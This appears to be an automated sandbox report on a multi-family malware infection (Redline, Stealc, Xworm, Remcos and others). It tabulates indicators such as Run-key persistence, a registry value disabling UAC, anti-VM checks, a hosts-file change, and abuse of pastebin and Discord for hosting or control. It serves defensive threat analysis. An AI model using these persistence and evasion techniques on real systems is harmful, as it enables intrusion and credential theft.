| N/A | N/A | N/A | N/A |
Redline family
Rms family
Stealc
Stealc family
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1384 created 1324 | N/A | N/A | C:\Windows\System32\Wbem\wmic.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 3312 created 3548 | N/A | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | C:\Windows\Explorer.EXE |
| PID 5416 created 3548 | N/A | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | C:\Windows\Explorer.EXE |
| PID 4528 created 620 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 2036 created 1648 | N/A | C:\Windows\System32\svchost.exe | C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe |
| PID 4072 created 3712 | N/A | C:\Windows\system32\svchost.exe | C:\Windows\SysWOW64\ruts\rutserv.exe |
| PID 2036 created 1324 | N/A | C:\Windows\System32\svchost.exe | C:\Windows\System32\Wbem\wmic.exe |
| PID 2036 created 3520 | N/A | C:\Windows\System32\svchost.exe | C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Umbral
Umbral family
Xworm
Xworm family
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Adds policy Run key to start application
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\XW.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\qwex.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Clipboard Data
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l4.exe | C:\Users\Admin\AppData\Local\Temp\onefile_1932_133785012670958301\l4.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Loads dropped DLL
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\ProgramData\Remcos\remcos.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Graph = "C:\\Program Files\\Windows Media Player\\graph\\graph.exe" | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetWorkManager = "C:\\Users\\Admin\\AppData\\Local\\Temp\\a\\networkmanager.exe" | C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Remcos = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\boleto = "C:\\Users\\Admin\\AppData\\Roaming\\boleto.exe" | C:\Users\Admin\AppData\Local\Temp\a\boleto.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | freegeoip.app | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | checkip.dyndns.org | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SysWOW64\ruts\rfusclient.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\ruts | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\lock | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\rutserv.exe | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs.tmp | C:\Windows\system32\lsass.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\boleto | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-certs | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\state.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File opened for modification | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdescs.new | C:\Windows\system32\lsass.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\rutssvc64 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\cached-microdesc-consensus | C:\Windows\System32\dllhost.exe | N/A |
| File created | C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\unverified-microdesc-consensus.tmp | C:\Windows\system32\lsass.exe | N/A |
| File created | C:\Windows\SysWOW64\ruts\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\xda | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\ruts\11.reg | C:\Users\Admin\AppData\Local\Temp\a\info.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\50to.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\888.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
